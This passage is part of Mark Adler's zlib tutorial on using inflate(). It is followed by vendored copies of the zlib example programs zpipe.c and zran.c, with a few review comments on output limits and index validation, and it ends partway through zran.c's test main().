The initialization of the state is the same, except that there is no compression level, of course, and two more elements of the structure are initialized. avail_in and next_in must be initialized before calling inflateInit(). This is because the application has the option to provide the start of the zlib stream in order for inflateInit() to have access to information about the compression method to aid in memory allocation. In the current implementation of zlib (up through versions 1.2.x), the method-dependent memory allocations are deferred to the first call of inflate() anyway. However those fields must be initialized since later versions of zlib that provide more compression methods may take advantage of this interface. In any case, no decompression is performed by inflateInit(), so the avail_out and next_out fields do not need to be initialized before calling.

Here avail_in is set to zero and next_in is set to Z_NULL to indicate that no input data is being provided.


    /* allocate inflate state */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit(&strm);
    if (ret != Z_OK)
        return ret;
The outer do-loop decompresses input until inflate() indicates that it has reached the end of the compressed data and has produced all of the uncompressed output. This is in contrast to def() which processes all of the input file. If end-of-file is reached before the compressed data self-terminates, then the compressed data is incomplete and an error is returned.

    /* decompress until deflate stream ends or end of file */
    do {
We read input data and set the strm structure accordingly. If we've reached the end of the input file, then we leave the outer loop and report an error, since the compressed data is incomplete. Note that we may read more data than is eventually consumed by inflate(), if the input file continues past the zlib stream. For applications where zlib streams are embedded in other data, this routine would need to be modified to return the unused data, or at least indicate how much of the input data was not used, so the application would know where to pick up after the zlib stream.

        strm.avail_in = fread(in, 1, CHUNK, source);
        if (ferror(source)) {
            (void)inflateEnd(&strm);
            return Z_ERRNO;
        }
        if (strm.avail_in == 0)
            break;
        strm.next_in = in;
The inner do-loop has the same function it did in def(), which is to keep calling inflate() until it has generated all of the output it can with the provided input.

        /* run inflate() on input until output buffer not full */
        do {
Just like in def(), the same output space is provided for each call of inflate().

            strm.avail_out = CHUNK;
            strm.next_out = out;
Now we run the decompression engine itself. There is no need to adjust the flush parameter, since the zlib format is self-terminating. The main difference here is that there are return values that we need to pay attention to. Z_DATA_ERROR indicates that inflate() detected an error in the zlib compressed data format, which means that either the data is not a zlib stream to begin with, or that the data was corrupted somewhere along the way since it was compressed. The other error to be processed is Z_MEM_ERROR, which can occur since memory allocation is deferred until inflate() needs it, unlike deflate(), whose memory is allocated at the start by deflateInit().

Advanced applications may use deflateSetDictionary() to prime deflate() with a set of likely data to improve the first 32K or so of compression. This is noted in the zlib header, so inflate() requests that that dictionary be provided before it can start to decompress. Without the dictionary, correct decompression is not possible. For this routine, we have no idea what the dictionary is, so the Z_NEED_DICT indication is converted to a Z_DATA_ERROR.

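inflate() can also return Z_STREAM_ERROR, which should not be possible here, but could be checked for as noted above for def(). The assert() that follows is removed when the program is compiled with NDEBUG defined, so it documents the guarantee rather than enforcing it in such builds. Z_BUF_ERROR does not need to be checked for here, for the same reasons noted for def(). Z_STREAM_END will be checked for later.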


            ret = inflate(&strm, Z_NO_FLUSH);
            assert(ret != Z_STREAM_ERROR);  /* state not clobbered */
            switch (ret) {
            case Z_NEED_DICT:
                ret = Z_DATA_ERROR;     /* and fall through */
            case Z_DATA_ERROR:
            case Z_MEM_ERROR:
                (void)inflateEnd(&strm);
                return ret;
            }
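The output of inflate() is handled identically to that of deflate(). Note that nothing in inf() bounds the total amount of output: a small compressed input can expand to a very large output, so an application decompressing data it does not trust would normally keep a running total of have and stop at a limit of its own choosing.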

            have = CHUNK - strm.avail_out;
            if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
                (void)inflateEnd(&strm);
                return Z_ERRNO;
            }
The inner do-loop ends when inflate() has no more output as indicated by not filling the output buffer, just as for deflate(). In this case, we cannot assert that strm.avail_in will be zero, since the deflate stream may end before the file does.

        } while (strm.avail_out == 0);
The outer do-loop ends when inflate() reports that it has reached the end of the input zlib stream, has completed the decompression and integrity check, and has provided all of the output. This is indicated by the inflate() return value Z_STREAM_END. The inner loop is guaranteed to leave ret equal to Z_STREAM_END if the last chunk of the input file read contained the end of the zlib stream. So if the return value is not Z_STREAM_END, the loop continues to read more input.

        /* done when inflate() says it's done */
    } while (ret != Z_STREAM_END);
At this point, decompression successfully completed, or we broke out of the loop due to no more data being available from the input file. If the last inflate() return value is not Z_STREAM_END, then the zlib stream was incomplete and a data error is returned. Otherwise, we return with a happy return value. Of course, inflateEnd() is called first to avoid a memory leak.

    /* clean up and return */
    (void)inflateEnd(&strm);
    return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR;
}
That ends the routines that directly use zlib. The following routines make this a command-line program by running data through the above routines from stdin to stdout, and handling any errors reported by def() or inf().

zerr() is used to interpret the possible error codes from def() and inf(), as detailed in their comments above, and print out an error message. Note that these are only a subset of the possible return values from deflate() and inflate().


/* Print a "zpipe: " prefixed message on stderr describing a def() or inf()
   return code.  For Z_ERRNO the error indicators of stdin and stdout decide
   which message(s) appear; a code with no entry below prints the prefix
   only. */
void zerr(int ret)
{
    const char *text = NULL;

    fputs("zpipe: ", stderr);

    if (ret == Z_ERRNO) {
        /* an i/o failure: report whichever standard stream is flagged */
        if (ferror(stdin))
            fputs("error reading stdin\n", stderr);
        if (ferror(stdout))
            fputs("error writing stdout\n", stderr);
        return;
    }

    /* the remaining zlib codes each map to one fixed message */
    if (ret == Z_STREAM_ERROR)
        text = "invalid compression level\n";
    else if (ret == Z_DATA_ERROR)
        text = "invalid or incomplete deflate data\n";
    else if (ret == Z_MEM_ERROR)
        text = "out of memory\n";
    else if (ret == Z_VERSION_ERROR)
        text = "zlib version mismatch!\n";

    if (text != NULL)
        fputs(text, stderr);
}
Here is the main() routine used to test def() and inf(). The zpipe command is simply a compression pipe from stdin to stdout, if no arguments are given, or it is a decompression pipe if zpipe -d is used. If any other arguments are provided, no compression or decompression is performed. Instead a usage message is displayed. Examples are zpipe < foo.txt > foo.txt.z to compress, and zpipe -d < foo.txt.z > foo.txt to decompress.

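/* compress or decompress from stdin to stdout

   With no arguments the input is compressed with def(); with the single
   argument -d it is decompressed with inf().  Any other arguments print a
   usage message and return 1.  Otherwise the return value is the def() or
   inf() code, or Z_ERRNO if the final flush of stdout fails. */
int main(int argc, char **argv)
{
    int ret;

    /* avoid end-of-line conversions */
    SET_BINARY_MODE(stdin);
    SET_BINARY_MODE(stdout);

    if (argc == 1) {
        /* do compression if no arguments */
        ret = def(stdin, stdout, Z_DEFAULT_COMPRESSION);
    }
    else if (argc == 2 && strcmp(argv[1], "-d") == 0) {
        /* do decompression if -d specified */
        ret = inf(stdin, stdout);
    }
    else {
        /* otherwise, report usage */
        fputs("zpipe usage: zpipe [-d] < source > dest\n", stderr);
        return 1;
    }

    /* def() and inf() check for write errors only around their fwrite()
       calls.  Output still held in the stdio buffer would otherwise be
       written at exit, where a failure (a full disk, a closed pipe) cannot
       change the exit status.  Flush here so that a truncated output is
       reported as Z_ERRNO instead of success. */
    if (ret == Z_OK && fflush(stdout) != 0)
        ret = Z_ERRNO;

    if (ret != Z_OK)
        zerr(ret);
    return ret;
}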

Last modified 24 January 2023
Copyright © 2004-2023 Mark Adler

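Creative Commons License Creative Commons Attribution-NoDerivatives 4.0 International License.

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zpipe.c
================================================
/* zpipe.c: example of proper use of zlib's inflate() and deflate()
   Not copyrighted -- provided to the public domain
   Version 1.4  11 December 2005  Mark Adler */

/* Version history:
   1.0  30 Oct 2004  First version
   1.1   8 Nov 2004  Add void casting for unused return values
                     Use switch statement for inflate() return values
   1.2   9 Nov 2004  Add assertions to document zlib guarantees
   1.3   6 Apr 2005  Remove incorrect assertion in inf()
   1.4  11 Dec 2005  Add hack to avoid MSDOS end-of-line conversions
                     Avoid some compiler warnings for input and output buffers
 */

#include <stdio.h>
#include <string.h>
#include <assert.h>
#include "zlib.h"

/* On platforms that translate line endings on text streams, switch the given
   stream to binary mode so compressed bytes pass through unmodified. */
#if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__)
#  include <fcntl.h>
#  include <io.h>
#  define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY)
#else
#  define SET_BINARY_MODE(file)
#endif

/* size of the input and output buffers used by def() and inf() */
#define CHUNK 16384

/* Compress from file source to file dest until EOF on source.
   def() returns Z_OK on success, Z_MEM_ERROR if memory could not be
   allocated for processing, Z_STREAM_ERROR if an invalid compression
   level is supplied, Z_VERSION_ERROR if the version of zlib.h and the
   version of the library linked do not match, or Z_ERRNO if there is
   an error reading or writing the files.

   The assert() calls document zlib guarantees; they are compiled out when
   NDEBUG is defined and are not part of the error handling. */
int def(FILE *source, FILE *dest, int level)
{
    int ret, flush;
    unsigned have;
    z_stream strm;
    unsigned char in[CHUNK];
    unsigned char out[CHUNK];

    /* allocate deflate state */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    ret = deflateInit(&strm, level);
    if (ret != Z_OK)
        return ret;

    /* compress until end of file */
    do {
        strm.avail_in = fread(in, 1, CHUNK, source);
        if (ferror(source)) {
            /* release the deflate state on every early exit */
            (void)deflateEnd(&strm);
            return Z_ERRNO;
        }
        /* the chunk that hits EOF is the one that finishes the stream */
        flush = feof(source) ? Z_FINISH : Z_NO_FLUSH;
        strm.next_in = in;

        /* run deflate() on input until output buffer not full, finish
           compression if all of source has been read in */
        do {
            strm.avail_out = CHUNK;
            strm.next_out = out;
            ret = deflate(&strm, flush);    /* no bad return value */
            assert(ret != Z_STREAM_ERROR);  /* state not clobbered */
            have = CHUNK - strm.avail_out;
            if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
                (void)deflateEnd(&strm);
                return Z_ERRNO;
            }
        } while (strm.avail_out == 0);
        assert(strm.avail_in == 0);     /* all input will be used */

        /* done when last data in file processed */
    } while (flush != Z_FINISH);
    assert(ret == Z_STREAM_END);        /* stream will be complete */

    /* clean up and return */
    (void)deflateEnd(&strm);
    return Z_OK;
}

/* Decompress from file source to file dest until stream ends or EOF.
   inf() returns Z_OK on success, Z_MEM_ERROR if memory could not be
   allocated for processing, Z_DATA_ERROR if the deflate data is
   invalid or incomplete, Z_VERSION_ERROR if the version of zlib.h and
   the version of the library linked do not match, or Z_ERRNO if there
   is an error reading or writing the files.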
*/
/* Review note: inf() writes out everything inflate() produces and sets no
   upper bound on the total, so the amount written to dest is decided by the
   compressed input. When source is untrusted, the caller needs its own limit
   on the output size. inf() stops at the first Z_STREAM_END; bytes that
   follow the stream in source are not examined. The assert() is compiled out
   when NDEBUG is defined and is not part of the error handling. */
int inf(FILE *source, FILE *dest)
{
    int ret;
    unsigned have;
    z_stream strm;
    unsigned char in[CHUNK];
    unsigned char out[CHUNK];

    /* allocate inflate state */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    strm.avail_in = 0;
    strm.next_in = Z_NULL;
    ret = inflateInit(&strm);
    if (ret != Z_OK)
        return ret;

    /* decompress until deflate stream ends or end of file */
    do {
        strm.avail_in = fread(in, 1, CHUNK, source);
        if (ferror(source)) {
            /* release the inflate state on every early exit */
            (void)inflateEnd(&strm);
            return Z_ERRNO;
        }
        /* EOF before Z_STREAM_END: leave the loop, reported below as
           Z_DATA_ERROR */
        if (strm.avail_in == 0)
            break;
        strm.next_in = in;

        /* run inflate() on input until output buffer not full */
        do {
            strm.avail_out = CHUNK;
            strm.next_out = out;
            ret = inflate(&strm, Z_NO_FLUSH);
            assert(ret != Z_STREAM_ERROR);  /* state not clobbered */
            switch (ret) {
            case Z_NEED_DICT:
                ret = Z_DATA_ERROR;     /* and fall through */
            case Z_DATA_ERROR:
            case Z_MEM_ERROR:
                (void)inflateEnd(&strm);
                return ret;
            }
            have = CHUNK - strm.avail_out;
            if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
                (void)inflateEnd(&strm);
                return Z_ERRNO;
            }
        } while (strm.avail_out == 0);

        /* done when inflate() says it's done */
    } while (ret != Z_STREAM_END);

    /* clean up and return */
    (void)inflateEnd(&strm);
    return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR;
}

/* report a zlib or i/o error */
/* Writes "zpipe: " and a message for the given zlib return code to stderr.
   For Z_ERRNO the message depends on which of stdin and stdout has its error
   indicator set; codes not listed in the switch print only the prefix. */
void zerr(int ret)
{
    fputs("zpipe: ", stderr);
    switch (ret) {
    case Z_ERRNO:
        if (ferror(stdin))
            fputs("error reading stdin\n", stderr);
        if (ferror(stdout))
            fputs("error writing stdout\n", stderr);
        break;
    case Z_STREAM_ERROR:
        fputs("invalid compression level\n", stderr);
        break;
    case Z_DATA_ERROR:
        fputs("invalid or incomplete deflate data\n", stderr);
        break;
    case Z_MEM_ERROR:
        fputs("out of memory\n", stderr);
        break;
    case Z_VERSION_ERROR:
        fputs("zlib version mismatch!\n", stderr);
    }
}

/* compress or decompress from stdin to stdout */
/* With no arguments stdin is compressed at Z_DEFAULT_COMPRESSION; with the
   single argument "-d" it is decompressed. The zlib return code is used as
   the exit status in both cases; any other command line prints the usage
   text and returns 1. */
int main(int argc, char **argv)
{
    int ret;

    /* avoid end-of-line conversions */
    SET_BINARY_MODE(stdin);
    SET_BINARY_MODE(stdout);

    /* do compression if no arguments */
    if (argc == 1) {
        ret = def(stdin, stdout, Z_DEFAULT_COMPRESSION);
        if (ret != Z_OK)
            zerr(ret);
        return ret;
    }

    /* do decompression if -d specified */
    else if (argc == 2 && strcmp(argv[1], "-d") == 0) {
        ret = inf(stdin, stdout);
        if (ret != Z_OK)
            zerr(ret);
        return ret;
    }

    /* otherwise, report usage */
    else {
        fputs("zpipe usage: zpipe [-d] < source > dest\n", stderr);
        return 1;
    }
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zran.c
================================================
/* zran.c -- example of deflate stream indexing and random access
 * Copyright (C) 2005, 2012, 2018, 2023 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 * Version 1.4  13 Apr 2023  Mark Adler */

/* Version History:
 1.0  29 May 2005  First version
 1.1  29 Sep 2012  Fix memory reallocation error
 1.2  14 Oct 2018  Handle gzip streams with multiple members
                   Add a header file to facilitate usage in applications
 1.3  18 Feb 2023  Permit raw deflate streams as well as zlib and gzip
                   Permit crossing gzip member boundaries when extracting
                   Support a size_t size when extracting (was an int)
                   Do a binary search over the index for an access point
                   Expose the
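access point type to enable save and load
 1.4  13 Apr 2023  Add a NOPRIME define to not use inflatePrime()
 */

// Illustrate the use of Z_BLOCK, inflatePrime(), and inflateSetDictionary()
// for random access of a compressed file. A file containing a raw deflate
// stream is provided on the command line. The compressed stream is decoded in
// its entirety, and an index built with access points about every SPAN bytes
// in the uncompressed output. The compressed file is left open, and can then
// be read randomly, having to decompress on the average SPAN/2 uncompressed
// bytes before getting to the desired block of data.
//
// An access point can be created at the start of any deflate block, by saving
// the starting file offset and bit of that block, and the 32K bytes of
// uncompressed data that precede that block. Also the uncompressed offset of
// that block is saved to provide a reference for locating a desired starting
// point in the uncompressed stream. deflate_index_build() decompresses the
// input raw deflate stream a block at a time, and at the end of each block
// decides if enough uncompressed data has gone by to justify the creation of a
// new access point. If so, that point is saved in a data structure that grows
// as needed to accommodate the points.
//
// To use the index, an offset in the uncompressed data is provided, for which
// the latest access point at or preceding that offset is located in the index.
// The input file is positioned to the specified location in the index, and if
// necessary the first few bits of the compressed data is read from the file.
// inflate is initialized with those bits and the 32K of uncompressed data, and
// decompression then proceeds until the desired offset in the file is reached.
// Then decompression continues to read the requested uncompressed data from
// the file.
//
// There is some fair bit of overhead to starting inflation for the random
// access, mainly copying the 32K byte dictionary. If small pieces of the file
// are being accessed, it would make sense to implement a cache to hold some
// lookahead to avoid many calls to deflate_index_extract() for small lengths.
//
// Another way to build an index would be to use inflateCopy(). That would not
// be constrained to have access points at block boundaries, but would require
// more memory per access point, and could not be saved to a file due to the
// use of pointers in the state. The approach here allows for storage of the
// index in a file.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include "zlib.h"
#include "zran.h"

#define WINSIZE 32768U      // sliding window size
#define CHUNK 16384         // file input buffer size

// See comments in zran.h.
void deflate_index_free(struct deflate_index *index) {
    if (index != NULL) {
        free(index->list);
        free(index);
    }
}

// Add an access point to the list. If out of memory, deallocate the existing
// list and return NULL. index->mode is temporarily the allocated number of
// access points, until it is time for deflate_index_build() to return. Then
// index->mode is set to the mode of inflation.
//
// bits, in and out are stored in the new point as given. window is the
// WINSIZE-byte circular output buffer and left is the space still unused in
// it; the two memcpy() calls below unroll it so that the stored window holds
// the preceding data in stream order.
static struct deflate_index *add_point(struct deflate_index *index, int bits,
                                       off_t in, off_t out, unsigned left,
                                       unsigned char *window) {
    if (index == NULL) {
        // The list is empty. Create it, starting with eight access points.
        index = malloc(sizeof(struct deflate_index));
        if (index == NULL)
            return NULL;
        index->have = 0;
        index->mode = 8;
        index->list = malloc(sizeof(point_t) * index->mode);
        if (index->list == NULL) {
            free(index);
            return NULL;
        }
    }

    else if (index->have == index->mode) {
        // The list is full. Make it bigger. Refuse to double when either the
        // int capacity or the byte count handed to realloc() would overflow.
        if (index->mode > INT_MAX / 2 ||
            (size_t)index->mode * 2 > (size_t)-1 / sizeof(point_t)) {
            deflate_index_free(index);
            return NULL;
        }
        index->mode <<= 1;
        point_t *next = realloc(index->list, sizeof(point_t) * index->mode);
        if (next == NULL) {
            deflate_index_free(index);
            return NULL;
        }
        index->list = next;
    }

    // Check the counter before incrementing it: signed overflow is undefined
    // behavior, so it cannot be detected reliably after the fact.
    if (index->have == INT_MAX) {
        // One more access point would overflow the int!
        deflate_index_free(index);
        return NULL;
    }

    // Fill in the access point and increment how many we have.
    point_t *next = (point_t *)(index->list) + index->have++;
    next->out = out;
    next->in = in;
    next->bits = bits;
    if (left)
        memcpy(next->window, window + WINSIZE - left, left);
    if (left < WINSIZE)
        memcpy(next->window + left, window, WINSIZE - left);

    // Return the index, which may have been newly allocated or destroyed.
    return index;
}

// Decompression modes. These are the inflateInit2() windowBits parameter.
#define RAW -15
#define ZLIB 15
#define GZIP 31

// See comments in zran.h.
//
// Review note: every access point stores a WINSIZE-byte window, and a point
// is added whenever at least span uncompressed bytes have gone by, so the
// memory used by the index follows from the input and from span. With
// span <= 0 every eligible block boundary becomes an access point.
int deflate_index_build(FILE *in, off_t span, struct deflate_index **built) {
    // Set up inflation state.
    z_stream strm = {0};        // inflate engine (gets fired up later)
    unsigned char buf[CHUNK];   // input buffer
    unsigned char win[WINSIZE] = {0};   // output sliding window
    off_t totin = 0;            // total bytes read from input
    off_t totout = 0;           // total bytes uncompressed
    int mode = 0;               // mode: RAW, ZLIB, or GZIP (0 => not set yet)

    // Decompress from in, generating access points along the way.
    int ret;                    // the return value from zlib, or Z_ERRNO
    off_t last = 0;             // last access point uncompressed offset (only
                                // read once index != NULL; initialized so it
                                // never holds an indeterminate value)
    struct deflate_index *index = NULL;     // list of access points
    do {
        // Assure available input, at least until reaching EOF.
        if (strm.avail_in == 0) {
            strm.avail_in = fread(buf, 1, sizeof(buf), in);
            totin += strm.avail_in;
            strm.next_in = buf;
            if (strm.avail_in < sizeof(buf) && ferror(in)) {
                ret = Z_ERRNO;
                break;
            }

            if (mode == 0) {
                // At the start of the input -- determine the type. Assume raw
                // if it is neither zlib nor gzip. This could in theory result
                // in a false positive for zlib, but in practice the fill bits
                // after a stored block are always zeros, so a raw stream won't
                // start with an 8 in the low nybble.
                mode = strm.avail_in == 0 ? RAW :   // empty -- will fail
                       (strm.next_in[0] & 0xf) == 8 ? ZLIB :
                       strm.next_in[0] == 0x1f ? GZIP :
                       /* else */ RAW;
                ret = inflateInit2(&strm, mode);
                if (ret != Z_OK)
                    break;
            }
        }

        // Assure available output. This rotates the output through, for use as
        // a sliding window on the uncompressed data.
        if (strm.avail_out == 0) {
            strm.avail_out = sizeof(win);
            strm.next_out = win;
        }

        if (mode == RAW && index == NULL)
            // We skip the inflate() call at the start of raw deflate data in
            // order generate an access point there. Set data_type to imitate
            // the end of a header.
            strm.data_type = 0x80;
        else {
            // Inflate and update the number of uncompressed bytes.
            unsigned before = strm.avail_out;
            ret = inflate(&strm, Z_BLOCK);
            totout += before - strm.avail_out;
        }

        if ((strm.data_type & 0xc0) == 0x80 &&
            (index == NULL || totout - last >= span)) {
            // We are at the end of a header or a non-last deflate block, so we
            // can add an access point here. Furthermore, we are either at the
            // very start for the first access point, or there has been span or
            // more uncompressed bytes since the last access point, so we want
            // to add an access point here.
            index = add_point(index, strm.data_type & 7, totin - strm.avail_in,
                              totout, strm.avail_out, win);
            if (index == NULL) {
                ret = Z_MEM_ERROR;
                break;
            }
            last = totout;
        }

        if (ret == Z_STREAM_END && mode == GZIP &&
            (strm.avail_in || ungetc(getc(in), in) != EOF))
            // There is more input after the end of a gzip member. Reset the
            // inflate state to read another gzip member. On success, this will
            // set ret to Z_OK to continue decompressing.
            ret = inflateReset2(&strm, GZIP);

        // Keep going until Z_STREAM_END or error. If the compressed data ends
        // prematurely without a file read error, Z_BUF_ERROR is returned.
    } while (ret == Z_OK);
    inflateEnd(&strm);

    if (ret != Z_STREAM_END) {
        // An error was encountered. Discard the index and return a negative
        // error code.
        deflate_index_free(index);
        return ret == Z_NEED_DICT ? Z_DATA_ERROR : ret;
    }

    // Shrink the index to only the occupied access points and return it.
    index->mode = mode;
    index->length = totout;
    point_t *list = realloc(index->list, sizeof(point_t) * index->have);
    if (list == NULL) {
        // Seems like a realloc() to make something smaller should always work,
        // but just in case.
        deflate_index_free(index);
        return Z_MEM_ERROR;
    }
    index->list = list;
    *built = index;
    return index->have;
}

#ifdef NOPRIME
// Support zlib versions before 1.2.3 (July 2005), or incomplete zlib clones
// that do not have inflatePrime().

#  define INFLATEPRIME inflatePreface

// Append the low bits bits of value to in[] at bit position *have, updating
// *have. value must be zero above its low bits bits. bits must be positive.
// This assumes that any bits above the *have bits in the last byte are zeros.
// That assumption is preserved on return, as any bits above *have + bits in
// the last byte written will be set to zeros.
static inline void append_bits(unsigned value, int bits,
                               unsigned char *in, int *have) {
    in += *have >> 3;           // where the first bits from value will go
    int k = *have & 7;          // the number of bits already there
    *have += bits;
    if (k)
        *in |= value << k;      // write value above the low k bits
    else
        *in = value;
    k = 8 - k;                  // the number of bits just appended
    while (bits > k) {
        value >>= k;            // drop the bits appended
        bits -= k;
        k = 8;                  // now at a byte boundary
        *++in = value;
    }
}

// Insert enough bits in the form of empty deflate blocks in front of the the
// low bits bits of value, in order to bring the sequence to a byte boundary.
// Then feed that to inflate(). This does what inflatePrime() does, except that
// a negative value of bits is not supported. bits must be in 0..16. If the
// arguments are invalid, Z_STREAM_ERROR is returned. Otherwise the return
// value from inflate() is returned.
static int inflatePreface(z_stream *strm, int bits, int value) {
    // Check input.
    if (strm == Z_NULL || bits < 0 || bits > 16)
        return Z_STREAM_ERROR;
    if (bits == 0)
        return Z_OK;
    value &= (2 << (bits - 1)) - 1;

    // An empty dynamic block with an odd number of bits (95). The high bit of
    // the last byte is unused.
    static const unsigned char dyn[] = {
        4, 0xe0, 0x81, 8, 0, 0, 0, 0, 0x20, 0xa8, 0xab, 0x1f
    };
    const int dynlen = 95;          // number of bits in the block

    // Build an input buffer for inflate that is a multiple of eight bits in
    // length, and that ends with the low bits bits of value.
    unsigned char in[(dynlen + 3 * 10 + 16 + 7) / 8];
    int have = 0;
    if (bits & 1) {
        // Insert an empty dynamic block to get to an odd number of bits, so
        // when bits bits from value are appended, we are at an even number of
        // bits.
        memcpy(in, dyn, sizeof(dyn));
        have = dynlen;
    }
    while ((have + bits) & 7)
        // Insert empty fixed blocks until appending bits bits would put us on
        // a byte boundary. This will insert at most three fixed blocks.
        append_bits(2, 10, in, &have);

    // Append the bits bits from value, which takes us to a byte boundary.
    append_bits(value, bits, in, &have);

    // Deliver the input to inflate(). There is no output space provided, but
    // inflate() can't get stuck waiting on output not ingesting all of the
    // provided input. The reason is that there will be at most 16 bits of
    // input from value after the empty deflate blocks (which themselves
    // generate no output). At least ten bits are needed to generate the first
    // output byte from a fixed block. The last two bytes of the buffer have to
    // be ingested in order to get ten bits, which is the most that value can
    // occupy.
    strm->avail_in = have >> 3;
    strm->next_in = in;
    strm->avail_out = 0;
    strm->next_out = in;                // not used, but can't be NULL
    return inflate(strm, Z_NO_FLUSH);
}

#else
#  define INFLATEPRIME inflatePrime
#endif

// See comments in zran.h.
//
// Review note: apart from the checks at the top, the contents of index are
// used as given (offsets, bit counts and the stored windows). An index that
// was saved and loaded again should be validated by whoever loads it before
// it is passed in here.
ptrdiff_t deflate_index_extract(FILE *in, struct deflate_index *index,
                                off_t offset, unsigned char *buf, size_t len) {
    // Do a quick sanity check on the index.
    if (index == NULL || index->have < 1 || index->list[0].out != 0)
        return Z_STREAM_ERROR;

    // If nothing to extract, return zero bytes extracted.
    if (len == 0 || offset < 0 || offset >= index->length)
        return 0;

    // Find the access point closest to but not after offset.
    int lo = -1, hi = index->have;
    point_t *point = index->list;
    while (hi - lo > 1) {
        int mid = (lo + hi) >> 1;
        if (offset < point[mid].out)
            hi = mid;
        else
            lo = mid;
    }
    point += lo;

    // add_point() only ever stores 0..7 here. Anything else means the index is
    // not valid, and would make the shift below undefined.
    if (point->bits < 0 || point->bits > 7)
        return Z_STREAM_ERROR;

    // Initialize the input file and prime the inflate engine to start there.
    int ret = fseeko(in, point->in - (point->bits ? 1 : 0), SEEK_SET);
    if (ret == -1)
        return Z_ERRNO;
    int ch = 0;
    if (point->bits && (ch = getc(in)) == EOF)
        return ferror(in) ? Z_ERRNO : Z_BUF_ERROR;
    z_stream strm = {0};
    ret = inflateInit2(&strm, RAW);
    if (ret != Z_OK)
        return ret;
    // NOTE(review): the return values of INFLATEPRIME() and
    // inflateSetDictionary() are not checked; a failure here would presumably
    // surface only through the inflate() calls below -- confirm.
    if (point->bits)
        INFLATEPRIME(&strm, point->bits, ch >> (8 - point->bits));
    inflateSetDictionary(&strm, point->window, WINSIZE);

    // Skip uncompressed bytes until offset reached, then satisfy request.
    unsigned char input[CHUNK];
    unsigned char discard[WINSIZE];
    offset -= point->out;       // number of bytes to skip to get to offset
    size_t left = len;          // number of bytes left to read after offset
    do {
        if (offset) {
            // Discard up to offset uncompressed bytes.
            strm.avail_out = offset < WINSIZE ? (unsigned)offset : WINSIZE;
            strm.next_out = discard;
        }
        else {
            // Uncompress up to left bytes into buf.
            strm.avail_out = left < UINT_MAX ? (unsigned)left : UINT_MAX;
            strm.next_out = buf + len - left;
        }

        // Uncompress, setting got to the number of bytes uncompressed.
        if (strm.avail_in == 0) {
            // Assure available input.
            strm.avail_in = fread(input, 1, CHUNK, in);
            if (strm.avail_in < CHUNK && ferror(in)) {
                ret = Z_ERRNO;
                break;
            }
            strm.next_in = input;
        }
        unsigned got = strm.avail_out;
        ret = inflate(&strm, Z_NO_FLUSH);
        got -= strm.avail_out;

        // Update the appropriate count.
        if (offset)
            offset -= got;
        else
            left -= got;

        // If we're at the end of a gzip member and there's more to read,
        // continue to the next gzip member.
        if (ret == Z_STREAM_END && index->mode == GZIP) {
            // Discard the gzip trailer.
            unsigned drop = 8;              // length of gzip trailer
            if (strm.avail_in >= drop) {
                strm.avail_in -= drop;
                strm.next_in += drop;
            }
            else {
                // Read and discard the remainder of the gzip trailer.
                drop -= strm.avail_in;
                strm.avail_in = 0;
                do {
                    if (getc(in) == EOF) {
                        // The input does not have a complete trailer. Release
                        // the inflate state before returning, so that this
                        // early exit does not leak it.
                        ret = ferror(in) ? Z_ERRNO : Z_BUF_ERROR;
                        inflateEnd(&strm);
                        return ret;
                    }
                } while (--drop);
            }

            if (strm.avail_in || ungetc(getc(in), in) != EOF) {
                // There's more after the gzip trailer. Use inflate to skip the
                // gzip header and resume the raw inflate there.
                inflateReset2(&strm, GZIP);
                do {
                    if (strm.avail_in == 0) {
                        strm.avail_in = fread(input, 1, CHUNK, in);
                        if (strm.avail_in < CHUNK && ferror(in)) {
                            ret = Z_ERRNO;
                            break;
                        }
                        strm.next_in = input;
                    }
                    strm.avail_out = WINSIZE;
                    strm.next_out = discard;
                    ret = inflate(&strm, Z_BLOCK);  // stop at end of header
                } while (ret == Z_OK && (strm.data_type & 0x80) == 0);
                if (ret != Z_OK)
                    break;
                inflateReset2(&strm, RAW);
            }
        }

        // Continue until we have the requested data, the deflate data has
        // ended, or an error is encountered.
    } while (ret == Z_OK && left);
    inflateEnd(&strm);

    // Return the number of uncompressed bytes read into buf, or the error.
    return ret == Z_OK || ret == Z_STREAM_END ? len - left : ret;
}

#ifdef TEST

#define SPAN 1048576L       // desired distance between access points
#define LEN 16384           // number of bytes to extract

// Demonstrate the use of deflate_index_build() and deflate_index_extract() by
// processing the file provided on the command line, and extracting LEN bytes
// from 2/3rds of the way through the uncompressed output, writing that to
// stdout. An offset can be provided as the second argument, in which case the
// data is extracted from there instead.
int main(int argc, char **argv) {
    // Open the input file.
    if (argc < 2 || argc > 3) {
        fprintf(stderr, "usage: zran file.raw [offset]\n");
        return 1;
    }
    FILE *in = fopen(argv[1], "rb");
    if (in == NULL) {
        fprintf(stderr, "zran: could not open %s for reading\n", argv[1]);
        return 1;
    }

    // Get optional offset.
    off_t offset = -1;
    if (argc == 3) {
        char *end;
        offset = strtoll(argv[2], &end, 10);
        if (*end || offset < 0) {
            fprintf(stderr, "zran: %s is not a valid offset\n", argv[2]);
            fclose(in);         // do not leave the input open on this path
            return 1;
        }
    }

    // Build index.
    struct deflate_index *index = NULL;
    int len = deflate_index_build(in, SPAN, &index);
    if (len < 0) {
        fclose(in);
        switch (len) {
        case Z_MEM_ERROR:
            fprintf(stderr, "zran: out of memory\n");
            break;
        case Z_BUF_ERROR:
            fprintf(stderr, "zran: %s ended prematurely\n", argv[1]);
            break;
        case Z_DATA_ERROR:
            fprintf(stderr, "zran: compressed data error in %s\n", argv[1]);
            break;
        case Z_ERRNO:
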